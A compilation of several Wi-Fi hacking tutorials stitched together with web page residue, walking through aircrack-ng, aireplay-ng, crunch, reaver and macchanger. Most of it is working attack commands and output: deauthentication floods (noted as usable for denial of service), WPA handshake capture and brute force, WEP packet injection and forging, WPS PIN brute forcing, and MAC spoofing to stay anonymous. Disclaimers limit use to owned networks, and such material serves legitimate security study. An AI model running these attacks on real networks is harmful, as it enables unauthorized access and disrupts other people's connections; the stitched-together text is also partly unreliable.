Air crack

To use aircrack-ng you’ll need a wireless network adapter that has monitor mode and packet
injection capabilities. Feel free to do some research about your particular card and it’s
compatibility. There’s a good guide on the aircrack-ng site that can help you with research. You
can also do what I did and buy a cheap USB wireless adapter with these capabilities. I have
the Panda Wireless N600 and it works perfectly fine on my Macbook Pro.

Installation
If you’re not on Kali Linux, aircrack-ng is most likely available through your preferred
package manager. For Windows users, refer to the official aircrack-ng site to download the suite.

Setting up monitor mode

We’ll need to set up monitor mode in our wireless network adapter. Monitor mode allows the
wireless network interface to capture all wireless traffic. This means we’ll be able to see nearby
wireless access points and devices connected to each one.

To set the network adapter to monitor mode, first find the name of the interface as your system
detects it. You can see this using ifconfig. In my case, the interface name of my USB wireless
adapter is wlan0. I can set it to monitor mode using the following commands:

$ ifconfig wlan0 down

$ iwconfig wlan0 mode monitor

$ ifconfig wlan0 up

Now, we need to check that no processes interfere with the airmon-ng tool, which is part of
the aircrack-ng suite. To do this, run:

$ airmon-ng check wlan0

You’ll get an output similar to the following:

Found 3 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to run 'airmon-ng check kill'

PID Name

1229 NetworkManager

1329 wpa_supplicant

3383 dhclient

We’ll need to kill all those processes to prevent any issues. Simply issue kill commands for
each process ID. Run airmon-ng check once again to be sure that all is well. We are now ready
to scan for access points.

Scanning for access points

To run a wireless scan using a particular interface, run the following command:

$ airodump-ng wlan0

Your terminal screen will fill up with something like this:

CH 10 ][ Elapsed: 0 s ][ 2019-09-27 21:57

 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH
ESSID

51:EF:63:2E:47:72 -55 0 0 0 3 -1
<length: 0>

7C:B1:DF:B9:12:59 -42 3 0 0 7 130 WPA2 CCMP PSK

Lower The Rent

DA:4B:77:1A:84:50 -75 2 0 0 1 195 WPA2 CCMP PSK

Spectrum

19:7H:8D:73:97:FE -77 2 0 0 1 195 WPA2 CCMP PSK

MyWifi

DA:F4:AC:DC:31:A7 -75 2 0 0 1 130 WPA2 CCMP PSK

Home

19:AD:EF:C4:0A:36 -71 3 0 0 1 195 WPA2 CCMP PSK

Verizon

5D:19:32:EA:E0:66 -62 3 0 0 1 360 WPA2 CCMP PSK

Cali

F5:10:4E:EA:E0:63 -62 3 0 0 1 360 WPA2 CCMP

<length: 0>

A2:72:C3:EA:E0:69 -62 3 0 0 1 360 OPN

<length: 0>

9D:58:61:62:68:21 -63 3 0 0 1 130 WPA2 CCMP PSK

INTERNET
 ED:3D:D4:64:A4:6C -79 2 0 0 1 65 WPA2 CCMP PSK
OfficeJet

33:B5:E2:92:08:33 -66 4 0 0 9 260 OPN

Test-guest

BSSID STATION PWR Rate Lost Frames Probe

(not associated) 88:D6:CD:88:4C:9D -47 0 - 1 95 5

(not associated) 93:1E:44:10:82:3A -63 0 - 1 0 2

7C:B1:DF:B9:12:59 49:12:C4:53:EF:4A -29 0 - 1 0 1

You’ll see a list of access points and devices associated with each access point. You’ll notice
there are acronyms above each column. Here’s a list of the ones we care about and what they
mean:

 BSSID - MAC Address of the access point

 PWR - Strength of the signal. The closer to 0, the better
 CH - Channel
 ESSID - Name of access point
 STATION - Device connected to access point (Laptop, smartphone, etc)

Now lets select an access point and run a scan on only that particular device. We’ll capture
traffic and save it to a file. You’ll need to make note of the BSSID and channel of the access
point. In my case, my router’s ESSID is “Lower The Rent”. We’ll scan it using the following
command formula:

$ airodump-ng -c [channel number] -w [filename for output] --bssid [MAC

Address of A.P.] [your interface]
In my case, the full command looks like this:

$ airodump-ng -c 7 -w SCAN_OUTPUT --bssid 7C:B1:DF:B9:12:59 wlan0

Here’s the output:

CH 7 ][ Elapsed: 24 s ][ 2019-09-27 22:05

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER

AUTH ESSID

7C:B1:DF:B9:12:59 -47 100 231 92 0 7 130 WPA2 CCMP

PSK Lower The Rent

BSSID STATION PWR Rate Lost Frames Probe

7C:B1:DF:B9:12:59 49:12:C4:53:EF:4A -31 0e- 1 0 130

You’ll be able to see the access point and associated devices. This provides a much cleaner look
instead of your terminal screen being full of information. We can see that there is a single device
associated with the access point.

Now we can commence an attack.

Attacking an access point

We’ll be flooding the access point with deauthentication frames to keep devices from
reconnecting to it. As they try to reconnect, we’ll be able to capture the 4-way handshake. This
can also be used to simply perform DOS attacks on an access point. Keep in mind you won’t be
able to capture the handshake if there are no devices associated to the access point. If there are
no devices associated, there is nothing conducting the authentication process which you can
capture.

While leaving the previous airodump-ng command running in a separate tab or window, open
another tab to run the deauthentication command. The command is as follows:

$ aireplay-ng -0 0 -a 7C:B1:DF:B9:12:59 wlan0

The BSSID we specify is that of the access point. It is possible to limit the amount of
deauthentication frames to send, but in this case we are sending an infinite amount specified
with -0 0.

The output for the aireplay-ng command will look like this:

03:24:06 Waiting for beacon frame (BSSID: 7C:B1:DF:B9:12:59) on channel 7

NB: this attack is more effective when targeting

a connected wireless client (-c <client's mac>).

03:24:06 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:07 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:07 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:08 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]
03:24:08 Sending DeAuth (code 7) to broadcast -- BSSID:
[7C:B1:DF:B9:12:59]

03:24:09 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:09 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:10 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:10 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:11 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:11 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

03:24:11 Sending DeAuth (code 7) to broadcast -- BSSID:

[7C:B1:DF:B9:12:59]

Your terminal screen will continue to fill with these messages. Keep the command running until
you see a WPA handshake: XX:XX:XX:XX:XX:XX message on the upper right of the first window
running the airodump-ng command. That window will look as follows (notice the message on
the upper right):

CH 7 ][ Elapsed: 1 min ][ 2019-09-28 03:25 ][ WPA handshake:

7C:B1:DF:B9:12:59

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER

AUTH ESSID
 7C:B1:DF:B9:12:59 -44 96 871 96 0 7 130 WPA2 CCMP
PSK Lower The Rent

BSSID STATION PWR Rate Lost Frames Probe

7C:B1:DF:B9:12:59 49:12:C4:53:EF:4A -41 1e- 1 0 78

If you see the message, you have successfully captured the handshake. The last step left to do
now is to crack this handshake and reveal the password in plaintext.

Cracking the password

Recall that we saved our airodump-ng scan to a file named SCAN_OUTPUT. You’ll see several
files in the directory by the same name, but you’ll only need the one with a .cap extension. From
here, there are two approaches to cracking the password. You can use a wordlist and see if one of
the passwords in the wordlist is the actual password to the access point, or you can opt to use a
program that generates passwords and attempts each one (brute forcing).

First, we’ll go over the approach using a wordlist. The command to begin cracking using a
wordlist is as follows:

$ aircrack-ng -w wordlist.txt SCAN_OUTPUT.cap

In my case, I used a short wordlist of 4800 passwords to try and crack the handshake. I was not
able to find the key, but this is what the output will look like:

Aircrack-ng 1.5.2
[00:00:00] 4800/4799 keys tested (5047.82 k/s)

Time left: 0 seconds 100.02%

KEY NOT FOUND

Master Key : 8B BB 3C 7A 08 50 43 73 73 BC 27 A0 A0 20 C2 C4

F8 82 0E 55 32 29 28 4C 93 CD 4D C0 3E E3 9C 4C

Transient Key : DE 14 79 DB 14 3B ED 7A 0D 80 FC DA 67 77 5C 09

C7 95 27 0C AC 2A 3B 2B 08 5F B5 22 B5 F6 F7 0F

C5 50 68 68 85 00 1E 80 33 1B F8 D9 FE E2 5B F4

71 EE D0 87 E4 57 ED 21 2D 66 CC 0B A7 A7 0D 1D

EAPOL HMAC : 35 D8 56 95 03 0B DF 6B 48 C4 DE 21 DB 01 7F E7
The tool will go through every password in the wordlist and try to crack the acess point’s
password. Wordlists are convenient and can be fast, but if the password is not in the wordlist
itself, we’ll need to try bruteforcing.

There are likely several tools out there that can generate password combinations, but I
used crunch. The formula to feed passwords generated by crunch into aircrack-ng is as
follows (notice we need to specify the ESSID this time):

$ crunch [min password length] [max password length] [characters to use] |

aircrack-ng -w - [filename.cap] -e [ESSID]

I already know the length of the passowrd to my own router. My full command looks like this:

$ crunch 14 14 abcdefghijklmnopqrstuvwxyz 1234567890 | aircrack-ng -w -

SCAN_OUTPUT.cap -e Lower\ The\ Rent

This will be very slow, as the program will attempt every 14-character letter and number
combination possible.

In my case, my router has the default password of pinkcoconut165. With this knowledge, I can
specify further. Instead of attempting a random mix of letters and numbers, I can test for a
specific arrangement of letters/numbers. Obviously, this would not be known if we were
attacking a completely unknown access point, but I want to demonstrate what a successful crack
looks like. Using the -t option we can specify a pattern. Here’s the description from
the man page:

-t @,%^

Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s,
and ^'s will change.

@ will insert lower case characters

, will insert upper case characters

% will insert numbers

 ^ will insert symbols

With this flag, we can modify our command as follows:

$ crunch 14 14 -t @@@@@@@@@@@%%% | aircrack-ng -w - SCAN_OUTPUT.cap -e

Lower\ The\ Rent

This will still take long, however, due to the length of the password. Let’s cheat a little bit just to
show the success screen. Here’s the new command where we will type in the letters of the
password and only try to guess the remaining digits:

crunch 14 14 -t pinkcoconut%%% | aircrack-ng -w - SCAN_OUTPUT.cap -e Lower\

The\ Rent

Success! The password has been found:

Aircrack-ng 1.5.2

[00:00:03] 842 keys tested (262.68 k/s)

KEY FOUND! [ pinkcoconut165 ]

 Master Key : 1C 7E B9 AE 6E 96 C3 29 A1 CC 8F 70 CE 3D 41 46

6A 02 A6 A3 82 E8 19 D8 34 12 E2 62 A6 79 8B C7

Transient Key : C1 FA BC A8 1E 15 B9 3F 7C 59 AA 00 8D 6F 9A C1

F8 D6 F2 A1 BB 8A 0F 71 05 D1 C0 89 88 34 04 CC

5A 10 EF FF 77 08 13 EF CA 8B 10 53 31 5E 65 20

A9 A8 25 7A 37 AA A8 A4 BD 67 6F E4 F9 36 14 C4

EAPOL HMAC : 92 FB C9 F7 B9 1B 60 B1 82 9B 90 BA 03 EF E4 83

Additional Tips

Changing Your MAC Address

If you want to stay as anonymous as possible, you can change your MAC Address before
attempting any of this. You can easily do this using a tool like macchanger. The following
command will assign a randomized MAC address to the wlan0 interface:

$ macchanger -r wlan0

We can be more clever and use a MAC address from a known company. The first 3 bytes of a
MAC address are known as the Organizationally Unique Identifier (OUI) and can identify the
manufacturer. For example, some of Dell’s devices have the first 3 bytes as F8:DB:88. The last 3
bytes can be anything, as long as it is within the range of A-F and 0-9 (hexadecimal values).

We can specify a MAC address with the following command:

$ macchanger -m f8:d8:88:64:fd:c7 wlan0

On MacOS you can change the MAC address of an interface to one of your choosing with the
following command:

$ sudo ifconfig wlan0 ether f8-db-88-e4-94-5d

Using this knowledge of MAC Addresses, we can also determine the manufacturers of the access
points we scan. We can look up the MAC addresses, figure out the manufacturer, and see if there
are other vulnerabilities with specific device models. Maybe we’ll discover their formula for
default passwords (which lots of people never change) to be, say, a combination of 5 letters and
5 numbers, which can help us crack the password. Any hint helps. Additionally, default ESSID
names, such as “NETGEAR23-2G”, could mean that the user never changed the default
password either ;).

Password Lists

Password lists are often used in password cracking to speed up the process. Instead of trying
every possible combination of characters, we can try our luck using leaked passwords from one
of these lists. A good place to find passwords lists and more is the SecLists GitHub repo. To start
off, I suggest trying one of the “Common Credentials” lists.

Password lists can be used along with the crunch tool we used earlier. crunch has much more
functionality that I did not dive into. I encourage you to read through the man pages and learn
more about it. It’s versatile but still easy to pick up.

Conclusions
In this post I covered how to use aircrack-ng to scan for nearby access points, capture the 4-
way handshake by sending spoofed deauthentication packets, and crack the hash using crunch.
Once again, only try this on devices you own!

Scanning for wifi networks and acquiring handshakes is not too difficult. Anyone with some
command line experience can achieve this. The hardest part will be cracking the password itself
due to processing power required.
This is an example of why long passwords are important. It is not enough to add symbols to a
short password. In fact, it is better to get into the habit of creating pass-phrases as opposed to
pass-words. A combination of words with lowercase and capital letters in addition so symbols
will be more secure than a single word with symbols. In other words, !
ThisIsALongPassword123? is much harder to crack than Password123?

There are other tools that we could have used to crack the password, such as hashcat. If I’m not
mistaken, hashcat can take advantage of a GPU which will allow you to crack passwords much
faster. However, I wanted to focus on the tools that come with the aircrack-ng suite.

This concludes my wifi hacking notes, I hope you learned something!

© 2022 Nelson Figueroa | 512kb.club | 1mb.club

Cracking WIFI Passwords with Aircrack-ng Suite.

Photo by Mick Haupt on Unsplash

This writing focuses entirely on practical ways of cracking
passwords, encryption types, and how to brute force WiFi
networks.

All practices should be done in a safe environment and this is

fully intended for educational purposes. Depending on the
hardware configuration and other external conditions you
may piss off someone and that’s not the point of this, so, be
cool and be aware that this can be harmful and illegal.

For this practice, I used a Kali Linux 2014.4 64 bits OS on

a regular Virtualbox machine and a WiFi TP-LINK TL-
WN321G Dongle that emulates a Physical Wireless card on
the virtualized OS.

Great! but we are going to crack the passwords of a WiFi

Network, but what is a Network?

The main concept of a Network summarizes in devices

connected together in order to transfer data or share
resources between connected devices.

In simple network topology, at least one element acts as a

server, and this element is the main responsible for handling,
containing, and sharing data across the network (in most
cases). You can already figure out which element I’m talking
about, it’s not that hard. The server is the router and the
data is the Internet

In simple words: The only device connected to the

Internet is the router, and other clients of the network
connection to it to get the shared data (Internet access).

A client sends a request to the router, the request goes to the

Internet, and then it forwards data packets back to the client
(response) through the router to the client.

Where:

 The request and response are networks packets

 We can see the information transferred through sniffers

(capture and read) information on it

Enough theory, let’s start cracking

Before using the Aircrack suite, we have to take a look at the

role of the MAC Address and how to spoof it. Let’s protect
our identity a little bit.

Each network card has a physical static address assigned by

the card manufacturer, it’s called the MAC (Media Access
Control) Address. This address is used between devices to
identify each other and to transfer packets to the right place.
Each packet contains a source MAC and destination MAC for
identification.

This also can apply for taking actions on a single device,

things like restrictions and more (WhiteList, BlackLists, etc)

Hopefully, Kali has a CLI tool called macchanger that can

change the value of the MAC Address sorted in the RAM
memory of the OS.

So, we can check for the connected physical network

interfaces with the command iwconfig. This command will
display the network interfaces connected to the machine, we
are going to use the wlan0 interface

Now, finally, let’s change the MAC Address of

the wlan0 interface, by shutting down the interface and
running the macchanger tool.
ifconfig wlan0 down macchanger --random wlan0 ifconfig wlan0 up

ifconfig was changed for new Kali Linux versions, now we

have to use the following:
ip set link wlan0 down macchanger --random wlan0 ip set link wlan0
up

Resulting in something like this:

Current MAC: ca:79:9c:99:58:1a (unknown)
Permanent MAC: f8:d1:11:14:dd:cc (TP-LINK TECHNOLOGIES CO., LTD.)
New MAC: 1e:92:CD:37:69:12 (unknown)
I previously said that: MAC Address is present
to ENSURE that each packet gets delivered to the right
place, so, how it’s possible to get the MAC address into
delivery?

Well, this is because the Wireless Card (Interface) has two

modes, the managed mode, and the monitor mode.

The managed Mode

It is the default behavior, it does ensure that will capture

packets if the destination MAC is our MAC Address. In a
simple way, this will get every packet addressed to me (me =
my computer).

The monitor Mode

This mode will capture ANY packet on the WiFi range

directed or not.

Enabling monitor

Almost every configuration have to be handled when the

interface is down, so, we have to shut down
the wlan0 interface in order to do that.

First of all, set shut down the interface by doing; ip set link

wlan0 down
And FINALLY, we are going to use the first program from
the Aircrack-ng suite, the airodump-ng

Sniffing with Airodump-ng

This program is a packet sniffer that allows capturing all the

packets that are in our WiFi card range. Basically, scan all
the WiFi networks around us and gather information about
them. But first, we need to run the following command:

airmon-ng start wlan0

Airmon-ng will create a new Virtual Wireless Card

called wlan0mon with monitor mode enabled. This interface will
be used in all the follow-up practices.

You can also shut down the monitor interface using the stop
command, just like this:

airmon-ng stop wlan0mon

We just finished our setup, we have the WiFi card ready for
start sniffing

So, by using:

airodump-ng wlan0mon
The program will start sniffing and will display a network
listing table and connected devices with the following
information:
BSSID -> MAC address for the access point (Network device)
PWR -> Power (the distance of the access point vs the Wifi Card)
The closer the network - the fastest is the attack
BEACON -> heartbeat kind of packet -
#DATA -> useful packets sniffed
#/s -> number of packets collected en 10 segs
CH -> broadcast channel (no interference)
MB -> Speed
ENC -> Encryption
CIPHER -> Decrypt packages (CCMP, TKIP)
AUTH -> Auth type

This will display all the networks and all the peripherals
connected to the networks filtered by their MAC Address.
But we can filter it in a certain way by targeting the sniffer to
one or many specific networks

Targeted Sniffing

Airodump-ng will be the core command for all the sniffing

processes. Targeting packets is accomplished by adding flags
to the airodump-ng command

Check this example:

airodump-ng --channel 11 --bssid B4:75:0E:A6:16:01 --write

davidfile.txt wlan0mon
This will segment the network into the specified with the
MAC Address. Also will create and write a file with the —
write command using the Monitor mode Interface. For this
scan, I use the output .txt file extension, but in case you
don’t specify it, the program will show a bunch of files with
some not so familiar extensions like .cap or .netxml

We can analyze this data using Wireshark, take fact that the
collected data will not be much of use if the target network
uses encryption

I previously said that airodump-ng displays all the

peripherals, right? Well, it shows the Stations (computers)
present on the network with stats of it such as:
STATION MAC:
MAC address PWR: Distance between Interface and the client's
computer LOST: packets lost FRAMES: useful packets

With a determined target network, is much easier to start

sending some attacks to the network depending on the
encryption file and the distance of it.

DeAuthentication Attacks

This attack is used to disconnect any device from a network

within our range even if the network is protected with a key
where a hacker sends de-authentication packets to the router
pretending to be the target machine (spoofing MAC
Address).

At the same time, the hacker sends packets to the target

machine (pretending to be the router) telling it that it needs
to re-authenticate itself.

For this time we are going to use aireplay program of

the aircrack-ng suite

aireplay-ng --deauth 200 --channel 11 -a B4:75:0E:A6:16:01 wlan0mon

This will apply to all the clients connected to the network,

but also we can specify a target MAC client with the -c flag

It’s easy.

To this point

We have been using a Virtual Network card, With all these

previous attacks so far we can do it without connecting to
the target network, but we can have more accurate
information if we can connect to the target network.

For this, if it’s an open network then we can just connect to it

without a password, on the other hand, if the target network
uses a key, we will need to decrypt packets
The common encryption types are the WEP, WPA, and of
course the WPA2, the cracking methods may vary according
to the encryption type and of course the combination of
hardware and the distance to the target station or router.
The complexity of each encryption increases from WEP to
the WPA2

Let’s start reviewing the attacks to the WEP encryption type.

Cracking the WEP Encryption

In a basic case, we have to take a look at the sniffing process

of WEP networks using airodump-ng with the monitor
mode interface.

For this lecture, we will refer to the router as an AP (Access

Point)

[With the sniffing process running]

aircrack-ng filename.cap will do the trick.

Once we got the Key, the sniffing process should stop and
we will have an Encrypted WEP Key for authenticating in
the target network.

Fake Authentication (Packet Injections)

This particular method will be a common rally point for some
scenarios where you don’t count the number of packets to
perform the attack.

We have two scenarios, for the first one let’s imagine

an AP (Access Point) with clients connected with regular
usage of the Internet (no videos basically). The second one is
if there are no stations on the network. The first case will not
require additional actions, but the second one will need to
inject packets into the traffic in order to force the router to
create new packets with new IV’s

aireplay-ng --fakeauth 100 -a 00:18:F8:BD:5C:F3 -h F8:D1:11:14:DD:CC

wlan0mon

Where:

1. — fakeauth (command) with X packets requests

2. -a: target BSSID

3. -h: local spoofed MAC Address

If the Authentication is granted, the value under AUTH (on

the table) column will change to OPN. And the output will
look something like this:
17:42:39 Waiting for beacon frame (BSSID: 00:18:F8:BD:5C:F3) on
channel 617:42:39Sending Authentication Request (Open
System)17:42:41 Sending Authentication Request (Open
System)17:42:43 Sending Authentication Request (Open
System)17:42:45 Sending Authentication Request (Open System)
[ACK]17:42:47 Sending Authentication Request (Open System)
[ACK]17:44:40 Authentication successful17:44:40 Sending Association
Request [ACK]17:44:40 Association successful :-) (AID: 1)

This method will wait for an ARP packet, will capture it and
inject it into the traffic

This consists of forcing the Access Point to generate a

new ARP packet with a new IV, we capture this new packet
and inject it into the traffic again and this has to be done
until the number of packets is sufficient enough to crack the
key

Before doing it you should, write a .cap file using Aircrack

and successfully associate and successful AUTH into the
target network
aireplay-ng --arpreplay 100 -b 00:18:F8:BD:5C:F3 -h
F8:D1:11:14:DD:CC wlan0mon

Where:

1. — fakeauth (command) with X packets requests

2. -b = target BSSID

3. -h = local spoofed MAC Address

Korek Chop Chop (Packets Injection)

This is another way to increase packets to a network for
decrypting keys for very low traffic networks.

Basically, in this method we will capture an ARP packet and

attempt to guess its keystream and use it to forge a new
packet using packetforge-ng and then we can inject
this new forged packet into the traffic to generate new IV’s.
This is a little bit hard to get it on the first try, at least for
me.

Using this command:

aireplay-ng --chopchop -b [target MAC] -h [your MAC] [INTERFACE]

If we split this code we will have the following actions:

 grab a bunch of packets (stream) and ask for decryption -

> Y/N

 Saves chosen packets in a .cap files

 Starts to guess and determine the keystream for target AP

(Xor, pt, frames, etc) with a resulting percentage.

But, how to forge a packet? well:

packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -

l 255.255.255.255 -y [file.xor] -w [output]

-0 -> for arp packets
-k destination
-l source
-y specify the name of the keystream

And then, we inject again the new IV’s with a previous

authentication

aireplay-ng -2 -r [resulting.xor] [interface]

Fragmentation Attack

This attack is pretty similar to the Korek Chop Chop

method

You will obtain the PRGA with this command:

aireplay-ng --fragment -b [target MAC] -h [your MAC] [interface]

What does this? This tries to generate a useful packet,

repeated times. Once it begins being useful, we are going the
use the keystream for forging packets with the .xor file

Forging Packet same as chopchop, but with — fragment

flag, for later inject the forged packet into the traffic like
this:

aireplay-ng -2 -r [out from last step][interface]

Both last two methods are not quite simple, you can make
practices by using a multiplexer terminal in order to
reproduce each step easily. Also, you may have to make
present that every hardware is different and sometimes it
won’t be possible to implement one or many techniques.

Now, let’s review the WPA and WPA2 cracking methods.

WPA Cracking

WPA was designed to address the issues in WEP and

provide better encryption.

The main issue in WEP is the short IV (initialization

vector) sent as plain text, so they can be repeated, therefore
by collecting a large number of IVs and with Aircrack-ng we
can determine the keystream and the WEP key.

In WPA each packet is encrypted with a unique temporary

key, the number of data packets that we collect is irrelevant.
They do not contain information for cracking WPA keys.

WPA/ WPA2 Cracking (WPS Feature)

Most of the packets contain useless information for cracking

(determining key)
WPS Feature

WPS is a feature that allows users to connect to WPS enable

networks easily, using a WPS button or only by
clicking WPS functionality where a Client will connect to
the network without entering the WPA key manually

Authentication is done by using an 8 digit long ping (not

the WPA key), this means that there is a relatively small
number of pin combinations, and using brute force we can
guess the pin in less than 10 hours.

For this, we are going to use a tool called “ reaver”, this tool
can recover the WPA/WPA2 key from the pin.

Getting WPA networks with Wash

Using the monitor interface let’s grab the WPA networks.

Usually, the wash CLI tool is not installed on Kali, but you
can find it on this Kali Linux Tools site

wash -i wlan0mon

Resulting:
BSSID - Mac Address
Channel - Wifi channel
WPS version - 1.0
RSSI - distance
WPS Locked - No => Sometimes can be locked - if yes - you can't do
this attack
ESSID - [network name]
And then, we can use reaver like this:

reaver -b [target MAC] -c [CHANNEL] -i [Interface monitor]

This is quite simple, but by the time I was practicing, there

were some theoretical doubts that I wasn’t clear at all.

Let’s recap again:

Capturing WPA packets is not that useful as they do not

contain any info that can be used to crack the key

But packets contain information, this is called handshake

packets

OK, but how it works?

Every time you connect to any AP a 4-way handshake occurs

between the client and the AP (4 packets connected to the
target network). We need to capture the handshake and then
with aircrack we will have to launch a word-list attack
against the handshake to determine the key.

Damn …
Again, for cracking WPA/WPA2 we need to capture the
handshake and after brute force it through a Word List or
a text dictionary

Capturing Handshake (Step by Step)

First, let’s run airodump-ng on the specific WAP target

airodump-ng --channel --bssid --write interface

Then, we need to force the handshake, this is possible by

forcing an un-auth or a simple network reconnection.

aireplay-ng --deauth [4] -a [AP] -c [target][interface]

PRO TIP: While you are doing this, pay attention to the right
corner message, this packet should say: WPA Handshake or
something like this [WPA Handshake:
00:10:18:90:2D:EE]

Creating a Word List

Great, you already have the AP Handshake detected, now we

will use Kali’s crunch tool that generates a word list, or you
can download a professional one on the Internet.
This step needs to make a brute force list style
so Aircrack will use to crack the WPA Key

./crunch [min][max][characters=lower|upper|numbers|smbols] -t

[pattern] -o file (output file)

This is an example of conditioning

./crunch 6 8 12356!"&$% -o wordlist -t a@@@@b -> chars between a and

And now, let’s use the freaking word list

Using aircrack-ng to crack the key. Combining each

password in the word list with the name ESSID to compute
a PairWise Master Key (PMK) using pbkdf2 algorithm.

PMK is compared to the handshake file.

aircrack-ng [handshake file] -w [wordlist][interface]

And wait to see what happens (results may vary) mostly in

time.

I’m pretty sure there are more common attacks for this
vulnerable encryption with more sophisticated ways of
performing it. Let’s keep this Gist updated.
Happy coding.

2
Sign up for Top Stories
By Level Up Coding
A monthly summary of the best stories shared in Level Up Coding Take a look.
By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more
information about our privacy practices.

Get this newsletter

More from Level Up Coding

Follow

Coding tutorials and news. The developer homepage gitconnected.com && skilled.dev &&
levelup.dev
Read more from Level Up Coding

Recommended from Medium

Golda Ellynn

{UPDATE} 8:AM Hack Free Resources Generator

Elsaid Salem

Zero Trust and Feature Exploits: vi/vim, more

Olimpia Ruberta

{UPDATE} Jet Ski Ship Hack Free Resources Generator

Kate Belson
GSoC with OpenMRS — Week 9 Update

Aariya Rathi

Why isn’t everyone doing it? ,If DMARC is so great

John P. Gormally, SR

Time to Accept the Risk of Open Source?

ya ren

InsureDAO has following distinctive functionalities.

Jeff Cunningham

In China, Hacking America Is a Career Path

Aircrack-ng is a Wi-Fi security auditing tool specifically 802.11 WEP and

WPA/WPA2-PSK. It is also used for cracking the WEP and WPA/WPA2-PSK keys
for gaining access to a network. Aircrack-ng is used by learning individuals
and security professionals to test the security, reliability of wireless
networks.

It can be installed by using the following command on the terminal:

sudo apt-get install aircrack-ng

The attacks range from Wifi Disconnection to obtaining handshakes to
cracking passwords. The attacks are to be performed by obtaining the
consent of the owner or only on those networks that are owned by you.

The first thing that we need to have to successfully attack, audit a network is
a Wi-Fi adapter that has monitor mode and allows packet injection. The
reason we have to use an external adapter is that the inbuilt adapter that
comes along with the PC doesn’t support monitor mode and packet
injection. Monitor mode allows the adapter to view and monitor all the
traffic received from the wireless network. This mode enables packets to be
captured without having to connect or link with an access point.

Cracking WEP
WEP(Wired Equivalent Privacy) is a Wi-Fi security protocol, its intention was
to provide data confidentiality comparable to that of a traditional wired
network. The flaw that we are targeting is Initialisation Vectors(IV), these
IVs are 24 bits long. For encryption, Wired Equivalent Privacy (WEP) can use
only a 64-bit or 128-bit number, which is made up of a 24-bit Initialization
Vector (IV) and a 40-bit or 104-bit default key. The use of short keys reduces
the encryption strength because short keys are easy to break, Also it uses an
algorithm called RC4 that is deprecated. The Wired Equivalent Privacy (WEP)
also creates a detectable pattern for attackers.

 Each packet is encrypted using a unique key stream.

 Random initialization vector (IV) is used to generate the keys streams.

 The initialization vector is only 24 bits

 IV + Key (password) = Key stream.

The catch here is that the IVs are repeated in a busy network. And this is the
vulnerability we are going to use, Repeated IVs can be used to determine the
keystream, and ultimately break the encryption.

We first need to capture a large number of packets so that we can get

enough IVs and store it in a file. The problem here is that if the network is
not busy, it would take some time to capture the IVs. We then need to
analyze the captured IV and crack the key.

To have aircrack-ng conduct a WEP key attack on a capture file, pass it the
filename, either in .ivs or .cap/.pcap format.

aircrack-ng filename.pcap

Cracking WPA/WPA2
Wi-Fi Protected Access2- Pre Shared Key is a method of securing one’s
network using the option of Pre-Shared key authentication. This kind of
mechanism is generally designed for a home environment and not for an
enterprise network. The network in this case is encrypted using a plaintext
passphrase between 8-63 characters. The passphrase along with the network
SSID is used to generate unique encryption keys for each client. Which are
constantly changed, thus it is near impossible that the keys are repeated and
we can get hold of it. Hacking into a network using WPA/WPA2 protocol is
difficult due to the complex algorithm it uses.

There are two popular methods used to crack WPA/WPA2

WPS method

WPS is a feature that can be used with WPA & WPA2. This allows clients to
connect to the network without a password. The authentication is done using
an 8 digit pin. This is a vulnerability that exists in routers that ship with this
feature enabled by default. Many routers have a specific button dedicated to
WPS service. Although this feature can be made redundant by disabling the
WPS service using the Configure Router page, unfortunately, most people
don’t care about disabling it.

Generally, WPS forces devices to use an 8-digit numerical PIN system that
bypasses the passphrase. As 8 digits pins are comparatively smaller, all the
possible combinations can be tried in a shorter time period. This PIN is
always checked in groups of two 4-digit codes, and the connecting device is
informed whether the four-digit section is correct.

Wordlist method

Unlike in the case of WEP, the WPA/WPA2 packet contains no useful data.
The only packet that contains data of our interest is the handshake packet.
These are 4 packets that are sent to the client to connect to the network.
The handshake doesn’t any data that helps to retrieve the key. Rather it
helps to verify whether a key is valid or not.

We run the following command to intercept the handshake packets.

airodump-ng –bssid 00.11.33.22.44.55 –channel 1 –write
wpa_handshake mon0
This command will write the handshake to the wpa_handshake file.

To obtain a handshake we need to disconnect the client so that when the

connection is re-established we can intercept it.

airplay-ng -0 1 -a B6:14:6C:7E:40:9D -c 00:0F:B5:AE:CE:9D mon0

 here 0 means deauthentication and we are sending 1 deauthentication

packet here.

 -a B6:14:6C:7E:40:9D is the MAC address of the access point

 -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate

 mon0 is the interface name

Finally, we use the handshake to verify our key. We create a wordlist and/or
download some popular ones from the internet like the rockyou.txt. This
method is known as the Dictionary Bruteforce attack. If the wordlist contains
the password, it outputs the password.

aircrack-ng wpa wpa_handshake.cap -w rockyou.txt

 Share the Post...
Share on whatsapp

WhatsApp

Installing Aircrack-ng from Source

Legacy information can be found here.

Requirements
 Autoconf
 Automake
 Libtool
 shtool
 OpenSSL development package or libgcrypt development package.
 pkg-config
Linux
 Airmon-ng requires ethtool and rfkill
 If USB bus is present, lsusb
 If PCI/PCIe bus is present, lspci
 LibNetlink 1 (libnl-dev) or 3 (libnl-3-dev and libnl-genl-3-dev) development packages. It can be
disabled by passing –disable-libnl to configure.
